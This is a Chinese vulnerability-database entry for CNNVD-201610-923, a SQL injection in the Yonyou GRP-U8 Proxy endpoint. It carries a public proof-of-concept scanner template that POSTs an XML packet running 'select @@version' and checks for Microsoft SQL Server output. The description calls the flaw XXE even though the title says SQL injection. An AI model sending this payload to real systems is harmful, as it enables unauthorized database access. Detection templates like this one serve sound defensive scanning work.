CNNVD-201610-923: 用友 GRP-U8 Proxy SQL注入

日期: 2025-09-01 | 影响软件: 用友GRP-U8 Proxy | POC: 已公开

漏洞描述

用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载外部SQL语句,以及命令执行 title="用友GRP-U8行政事业内控管理软件"

PoC代码[已公开]

id: CNNVD-201610-923

info:
  name: 用友 GRP-U8 Proxy SQL注入
  author: zan8in
  severity: high
  description: |
    用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载外部SQL语句,以及命令执行
    title="用友GRP-U8行政事业内控管理软件"
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html

rules:
  r0:
    request:
      method: POST
      path: /Proxy
      body: |
        cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>
    expression: response.status == 200 && response.body.bcontains(b'<sessionid>') && response.body.bcontains(b'<rowdata>') && response.body.bcontains(b'<datapacket') && response.body.bcontains(b'<metadata>') && response.body.bcontains(b'Microsoft SQL Server')
expression: r0()

相关漏洞推荐